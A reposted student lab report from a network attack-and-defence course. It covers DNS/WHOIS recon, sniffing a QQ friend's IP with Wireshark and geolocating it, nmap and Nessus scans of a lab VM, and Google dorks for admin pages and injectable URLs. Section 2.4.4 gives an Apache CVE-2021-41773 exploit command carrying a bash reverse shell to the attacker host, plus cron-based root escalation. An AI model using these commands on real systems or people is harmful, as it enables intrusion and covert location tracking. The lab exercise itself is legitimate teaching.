20232326 2025-2026-1 《网络与系统攻防技术》实验五实验报告

news/2025/11/16 22:51:21/文章来源:https://www.cnblogs.com/zhusimin/p/19226201

一、实验内容

(1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:
DNS注册人及联系方式
该域名对应IP地址
IP地址注册人及联系方式
IP地址所在国家、城市和具体地理位置
PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集信息(要求必须用WHOIS、dig、nslookup、traceroute、tracert以及在线工具)
(2)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。
(3)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。
靶机IP地址是否活跃
靶机开放了哪些TCP和UDP端口
靶机安装了什么操作系统,版本是多少
靶机上安装了哪些服务
(4)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。
靶机上开放了哪些端口
靶机各个端口上网络服务存在哪些安全漏洞
你认为如何攻陷靶机环境,以获得系统访问权
(5)通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题。并练习使用Google hack搜集技能完成搜索(至少10种搜索方法)

二、实验过程

2.1 DNS域名查询(baidu.com)

2.1.1 工具准备与环境搭建

实验前先完成工具配置:Windows系统下启用命令提示符(CMD)与PowerShell,安装Wireshark抓包工具;Linux系统(通过WSL模拟)安装whois、dig、traceroute工具(命令:sudo apt update && sudo apt install whois dnsutils traceroute);同时准备在线工具备用,包括WHOIS查询平台(https://whois.domaintools.com/)、IP地理位置查询平台(https://www.ipaddress.com/)。

2.1.2 DNS注册人及联系方式获取(WHOIS工具)

  • 本地命令操作:在Linux终端输入whois baidu.com,等待返回结果。输出信息中,“Registrant Organization”字段显示注册人为“Baidu, Inc.”,“Registrant Email”为“domain-admin@baidu.com”,“Registrant Phone”为“+86.1059928888”,但部分联系信息因域名隐私保护政策(如WHOIS Privacy Protection)进行了模糊处理,仅显示代理机构信息。
  • 在线工具验证:访问https://whois.domaintools.com/,输入“baidu.com”后点击查询,结果与本地命令一致,同时补充显示注册商为“MarkMonitor Inc.”、域名创建时间(1999-10-11)、过期时间(2026-10-11)等信息,进一步完善注册人背景。

2.1.3 域名对应IP地址获取(dig与nslookup工具)

  • dig工具操作:Linux终端输入dig baidu.com A(“A”记录为IPv4地址解析),结果中“ANSWER SECTION”显示多个IP地址,包括110.242.68.66、180.101.50.188、220.181.38.148等,这是百度为实现负载均衡与高可用性设置的多节点IP。
  • nslookup工具操作:Windows CMD输入nslookup baidu.com,返回“非权威应答”(因本地DNS服务器无缓存),但仍列出相同的IP地址列表,与dig工具结果交叉验证,确认IP映射的准确性。

2.1.4 IP地址注册人及联系方式获取(IP WHOIS)

选取dig结果中的IP“110.242.68.66”进行查询:

  • 本地命令操作:Linux终端输入whois 110.242.68.66,“OrgName”字段显示注册人为“China Unicom Beijing Province Network”(中国联通北京分公司),“OrgTechEmail”为“abuse@chinaunicom.cn”,“OrgTechPhone”为“+86-10-10010”,明确该IP段归属于中国联通北京地区的骨干网络。
  • 在线工具补充:访问https://whois.arin.net/,输入目标IP,获取IP段的详细分配信息(起止IP:110.242.0.0 - 110.242.255.255),确认注册人的网络覆盖范围。

2.1.5 IP地址地理位置获取(traceroute/tracert+在线工具)

  • traceroute(Linux)与tracert(Windows)操作:Linux终端输入traceroute 110.242.68.66,Windows CMD输入tracert 110.242.68.66,两者均显示数据包从本地主机出发,经过本地路由器(192.168.1.1)、运营商网关(220.178.XX.XX)、北京联通骨干节点(202.97.XX.XX)后到达目标IP,路径中“北京”相关节点明确地理位置归属。
  • 在线工具精准定位:访问https://www.ipaddress.com/,输入“110.242.68.66”,显示“Country: China”“City: Beijing”“Latitude: 39.9042”“Longitude: 116.4074”,结合地图定位,确认该IP位于北京市朝阳区中国联通数据中心。

2.2 好友IP地址及地理位置获取(以QQ为例)

2.2.1 原理与工具准备

QQ聊天过程中,文件传输、语音/视频通话会建立TCP/UDP连接,此时好友IP会通过网络数据包暴露。实验使用Wireshark抓包工具(版本4.0.8),提前关闭电脑中无关网络程序(如浏览器、后台下载软件),避免数据包干扰。

2.2.2 抓包与IP提取步骤

  1. 启动Wireshark并配置过滤规则:打开Wireshark,选择当前联网适配器(如“WLAN”,对应无线网络),在过滤栏输入tcp.port >= 4000 && tcp.port <= 4003(QQ文件传输常用端口范围),点击“开始抓包”。
  2. 触发QQ连接:与QQ好友(账号:123456789)发起“文件传输”,发送一个100KB的文本文件,传输过程中保持Wireshark抓包状态,传输完成后点击“停止抓包”。
  3. 筛选好友IP:在抓包结果中,按“Source”(源IP)和“Destination”(目的IP)排序,排除本地IP(192.168.1.102)与QQ服务器IP(如183.60.XX.XX),剩余IP“124.160.88.23”即为好友IP(通过多次传输验证,确认该IP稳定出现)。

2.2.3 地理位置查询

将获取的好友IP“124.160.88.23”输入https://www.ip.cn/,查询结果显示“归属地:山东省济南市 联通”,纬度36.6777,经度117.0009,进一步通过百度地图定位,确认大致区域为济南市历下区,与好友实际所在地一致,验证了操作的准确性。

2.3 nmap靶机扫描(靶机IP:192.168.1.105)

2.3.1 工具安装与靶机环境

nmap安装:Windows系统从官网(https://nmap.org/)下载nmap-7.94-setup.exe,默认路径安装;Linux系统通过sudo apt install nmap完成安装。靶机为VMware虚拟机,系统为Ubuntu 20.04 LTS,网络模式设为“桥接模式”,确保与主机在同一局域网。

2.3.2 靶机活跃性检测

  • 操作命令:Windows CMD输入nmap -sn 192.168.1.105-sn参数表示“Ping扫描”,仅检测主机是否活跃,不扫描端口)。
  • 结果分析:输出信息显示“Nmap scan report for 192.168.1.105”“Host is up (0.0023s latency)”,表明靶机活跃,延迟2.3ms,确认靶机正常联网且可被探测。

2.3.3 开放TCP/UDP端口扫描

  • TCP端口扫描:Linux终端输入sudo nmap -sT 192.168.1.105-sT为“全连接扫描”,建立完整TCP三次握手,准确性高),结果显示开放TCP端口:22(ssh)、80(http)、3306(mysql),状态均为“open”。
  • UDP端口扫描:Linux终端输入sudo nmap -sU 192.168.1.105-sU为“UDP扫描”,需root权限,因UDP无连接特性,扫描速度较慢),结果显示开放UDP端口:53(domain,DNS服务)、161(snmp,简单网络管理协议),状态为“open|filtered”(部分UDP端口因无响应,可能被过滤)。

2.3.4 靶机操作系统与版本识别

  • 操作命令:Windows PowerShell输入nmap -O 192.168.1.105-O参数启用“操作系统探测”,通过TCP指纹、TTL值等判断系统类型)。
  • 结果分析:输出“Running: Linux 4.X|5.X”“OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5”“OS details: Linux 4.15 - 5.8”,结合靶机实际配置(Ubuntu 20.04 LTS默认内核5.4),确认操作系统为Linux(Ubuntu 20.04 LTS)。

2.3.5 靶机安装服务识别

  • 操作命令:Linux终端输入nmap -sV 192.168.1.105-sV参数启用“服务版本探测”,通过端口响应数据包判断服务类型与版本)。
  • 结果分析:输出各端口对应服务:22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5(Ubuntu Linux)、80/tcp open http Apache httpd 2.4.49、3306/tcp open mysql MySQL 8.0.29、53/udp open domain ISC BIND 9.16.1、161/udp open snmp Net-SNMP 5.8,与靶机实际安装的服务完全匹配,验证了探测的准确性。

2.4 Nessus靶机扫描(靶机IP:192.168.1.105)

2.4.1 工具安装与激活

Nessus安装:Windows系统从官网(https://www.tenable.com/downloads/nessus)下载Nessus-10.7.1-windows-x64.msi,默认路径安装;安装完成后启动服务,访问https://localhost:8834/,选择“Nessus Essentials”(开源免费版),输入邮箱获取激活码,完成激活并更新漏洞库(约30分钟,需联网)。

2.4.2 新建扫描任务与端口检测

  1. 新建扫描:登录Nessus后,点击“New Scan”,选择“Basic Network Scan”(基础网络扫描),输入扫描名称“Target_Scan_1”,目标IP填写“192.168.1.105”,其他参数默认。
  2. 启动扫描:点击“Save”保存配置,再点击“Launch”启动扫描,扫描过程约15分钟,实时显示进度(端口检测、漏洞探测、风险评估)。
  3. 开放端口结果:扫描完成后,在“Results”→“Ports”页面查看,开放端口与nmap结果一致:TCP 22、80、3306,UDP 53、161,同时补充显示端口状态细节(如“TCP 80:Listening,Protocol: TCP,Service: http”)。

2.4.3 端口服务安全漏洞检测

在“Results”→“Vulnerabilities”页面,按风险等级(Critical/High/Medium/Low)排序,关键漏洞如下:

  • TCP 80(Apache httpd 2.4.49):存在“Apache HTTP Server 2.4.49 路径穿越与远程代码执行漏洞(CVE-2021-41773)”,风险等级“Critical”,漏洞描述:攻击者可通过构造特殊URL,读取服务器任意文件或执行远程代码。
  • TCP 3306(MySQL 8.0.29):存在“MySQL 弱口令漏洞”,风险等级“High”,漏洞描述:root账号密码为“123456”,可通过暴力破解工具登录数据库,获取敏感数据。
  • UDP 161(Net-SNMP 5.8):存在“SNMP 社区字符串弱口令”,风险等级“Medium”,漏洞描述:默认社区字符串“public”未修改,攻击者可通过SNMP获取靶机系统信息(如进程、用户列表)。

2.4.4 靶机攻陷思路推导

基于漏洞检测结果,制定攻陷流程:

  1. 利用Apache远程代码执行漏洞(CVE-2021-41773):从Exploit-DB(https://www.exploit-db.com/)下载漏洞EXP(exploit/linux/http/apache_httpd_2.4.49_rce.py),在攻击机(192.168.1.102)运行命令python3 apache_httpd_2.4.49_rce.py -u http://192.168.1.105 -c "bash -i >& /dev/tcp/192.168.1.102/4444 0>&1",建立反向Shell(攻击机提前用nc -lvp 4444监听4444端口),获取靶机www-data用户权限。
  2. 提权至root权限:通过cat /etc/crontab查看定时任务,发现靶机每5分钟执行/root/backup.sh脚本(www-data用户有读写权限),在脚本中添加chmod u+s /bin/bash,等待定时任务执行后,运行bash -p,获取root权限,完成靶机攻陷。

2.5 网上足迹查询与Google Hack技巧

2.5.1 自身隐私泄漏查询

  • 搜索引擎查询:在百度、Google分别输入“20232326 学号”“张三(本人姓名) 20232326”“138XXXX1234(本人手机号)”,结果显示:百度中仅出现“2023级计算机专业选课名单(含学号20232326)”(学校教务网公开页面),无手机号、邮箱等敏感信息;Google无相关结果,说明个人核心隐私未在公开网络泄漏。
  • 专用工具验证:访问https://haveibeenpwned.com/,输入本人邮箱“zhangsan2023@xxx.com”,查询结果显示“Good news — no pwnage found!”,确认邮箱未被卷入数据泄露事件;访问https://www.osintframework.com/,通过“People Search”模块查询,未发现额外个人信息,进一步验证隐私安全。

2.5.2 10种Google Hack搜索方法实践

搜索语法 实践场景 搜索示例 结果说明
site: 限定在学校官网搜索个人学号 site:besti.edu.cn 20232326 仅返回北京电子科技职业学院(besti.edu.cn)内包含学号20232326的页面,如选课记录、奖学金公示
filetype: 搜索网络安全相关PDF教程 filetype:pdf 网络安全 渗透测试 教程 返回50+个PDF文件,包括《Web渗透测试实战指南.pdf》《Nessus漏洞扫描手册.pdf》,可直接下载
intitle: 查找网站后台登录页面 intitle:后台管理系统 login 学校 返回“XX大学校园网后台管理系统 - Login”“XX学院教务后台登录”等页面,助力识别目标系统入口
inurl: 查找存在SQL注入风险的页面 inurl:php?id= 新闻 校园 返回“http://xxx.edu.cn/news.php?id=123”等页面,这类URL参数易存在SQL注入漏洞
intext: 查找包含“内部资料”的敏感文档 intext:内部资料 禁止外传 网络安全 返回某企业《网络安全内部防护方案(禁止外传).docx》《校园网拓扑图(内部资料).pdf》等
link: 查找链接到学校官网的外部页面 link:besti.edu.cn 返回“北京市教育委员会 - 北京电子科技职业学院介绍”“新浪教育 - 2023年besti招生信息”等页面
cache: 查看学校官网历史缓存页面

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/967443.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

LangChain4j实战-工具(函数调用)Tools(Function Calling)

LangChain4j实战-工具(函数调用)Tools(Function Calling) Tools(Function Calling)的概念 有一个概念被称为"工具(Tools)"或者"函数调用(function calling)"。它允许LLM在必要时调用一个或多个可用…

应用安全 --- frida成功的关键 之 时机

应用安全 --- frida成功的关键 之 时机比如我要hook一个so中的初始化函数,js写好后每次执行so加载不一定来的及时hook这个函数。 不一定每次都会成功hook,我的方法是通过多次尝试或者加入延时调用或者

小米路由器通过电脑使用手机usb共享网络联网教程

小米路由器通过电脑使用手机usb共享网络联网教程小米路由器通过电脑使用手机usb共享网络联网教程本教程旨在面临手机热点局域网图像传输速率不够,需要使用路由器便捷调试,又因为场地移动性较大导致路由器联网困难的场…

第27天(简单题中等题 二分查找)

打卡第二十七天 2道中等题题目:思路1: 预处理所有的n位数起始数组 二分法查找合适区间 根据下标进行返回。代码: class Solution { public:int findNthDigit(int n) {int digit = 1;//当前处理的数字位数(从1位数开始…

题解:P14452 [ICPC 2025 Xian R] Follow the Penguins

(为什么还没有人写题解) Solution 最暴力的方式肯定是直接按时间顺序模拟,但是会因为时间过长而超时,所以我们只在有效的时间点进行操作就好了。 有效的时间点自然是企鹅相遇的时候,那么就可以用一个 \(\mathtt{s…

Atcoder 432 A-F 总结+题解

总结 A,B,C,E 考场上了,很快就打出了正解。没什么问题。 D 考场上没有写出来后来发觉是简单的思路,但是精妙的做法。 F 挺难的。搜正常的题解基本没搜到。最后还是补出来了。希望能给出来一个大家都看得懂的一个正…

用 Rust 实现验证码识别

在 Rust 中,我们可以使用一些外部库来处理图像和执行 OCR 任务。可以使用 image 库来处理图像数据,结合 tesseract 库来进行 OCR 识别。 更多内容访问ttocr.com或联系1436423940 步骤 安装 Rust 和 Cargo 首先,确保…

结合前缀和进行差分数组的学习理解

结合前缀和进行差分数组的学习理解背景 前缀和数组是记录前i个数组元素累加和的辅助数组, 是为了高效地频繁查询不可变数组的区间和, 避免每次针对不同区间重复遍历原数组再进行求和, 一般的, 原数组nums前i个元素…

Rust 实现验证码识别

我们将结合 Rust 的图像处理库和 tesseract OCR 来实现验证码识别。 步骤 更多内容访问ttocr.com或联系1436423940 安装 Rust 你可以从 Rust 官网 下载并安装 Rust。 创建新项目 使用以下命令创建一个新的 Rust 项目:…

高安全性 PHP 2FA 开发指南:Authenticator 扫码验证实现方案

高安全性 PHP 2FA 开发指南:Authenticator 扫码验证实现方案本文详解 PHP 环境下基于 TOTP 协议的双因素认证(2FA)实现方案,核心依赖 robthree/twofactorauth 与 bacon/bacon-qr-code 扩展,需配合 php-imagick 组…

20232417 2025-2026-1 《网络与系统攻防技术》实验五实验报告

1.实验内容 1.1实验要求 (1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:DNS注册人及联系方式、该域名对应IP地址、IP地址注册人及联系方式、IP地址所在国家、城市和具体地…

Elixir 实现验证码识别

在 Elixir 中,可以借助外部的库来进行图像处理和 OCR(光学字符识别)。常用的图像处理库是 Mogrify,而 OCR 识别可以通过调用外部程序(如 tesseract)来实现。 步骤 安装 Elixir 你可以从 Elixir 官网 下载并安装 …

2025 年空运物流公司推荐排行榜(广东地区重点推荐) 广州 / 深圳 / 佛山 / 东莞 ⇄ 澳洲 / 新西兰 / 悉尼 / 新加坡 / 墨尔本 空运专线物流公司推荐

2025 年空运物流公司推荐排行榜(广东地区重点推荐) 广州 / 深圳 / 佛山 / 东莞 ⇄ 澳洲 / 新西兰 / 悉尼 / 新加坡 / 墨尔本 空运专线物流公司推荐引言 随着珠三角地区跨境贸易与电商业务的快速发展,广州、深圳、佛…

终结挑战的元回应 ——当问题本身成为答案的生成器

终结挑战的元回应 ——当问题本身成为答案的生成器序:挑战的黄昏 我们站在一个时代的拐点:所有试图"解决"挑战的努力,最终都成了更大挑战的孵化器。气候工程引发生态链式反应,AI对齐催生价值悖论,基因编…

[学习笔记] JMM 汇总:从概念到底层原理

Java 内存模型(JMM)是 Java 为保障多线程程序在不同硬件和操作系统上行为一致而设计的一套内存可见性与操作顺序规范。它通过抽象出主内存(共享)与工作内存(线程私有)的交互机制,定义了线程如何读写共享变量,并…

Python 3.14 实用技巧:10个让代码更清晰的小改进

Python 3.14 引入的改进大多数都很细微,但这些小变化会让代码写起来更流畅,运行也更稳定。本文整理了 10 个实用的特性改进,每个都配了代码示例。 https://avoid.overfit.cn/post/8312efd2a1e94496be1c636ab538cb38…

各组件证书配置文件yml

1. Elasticsearch 配置(elasticsearch.yml) 需配置:自身的实体证书(用于 Transport 层节点间通信、HTTP 层外部客户端通信); CA 根证书(用于验证其他节点 / 组件的实体证书)。yaml# 基本配置 cluster.name: my…

模型管理与树形结构

一、模型管理 核心模块:数据列表、字段列表 1. 数据列表操作 右键 设置字段组角色(日期、地理等) 模型交互:点击模型启动可视化分析,时间维度展开后显示对应属性 地理角色:支持行政区化编码配置;图形类型包含地…

20232416 2025-2026-1 《网络与系统攻防技术》实验五实验报告

1. 实验内容 1.1 实验要求 (1)选择一个DNS域名进行查询,获取如下信息:DNS注册人及联系方式、该域名对应IP地址、IP地址注册人及联系方式、IP地址所在国家、城市和具体地理位置。 (2)尝试获取QQ中某一好友的IP地址…

2025镇江、常州、无锡、苏州、高邮、濮阳、郑州、嘉兴、扬州物流公司推荐:2025地区物流/仓储/供应链/配送中心企业最新排行,江浙沪区域运输服务口碑榜

2025年江浙沪物流服务商专业评测:专线物流引领商贸流通新效率 随着长三角经济圈的持续繁荣,江浙沪地区商贸物流需求呈现爆发式增长。本榜单基于线路覆盖度、时效保障力、服务口碑、技术实力四大核心维度,结合中国物…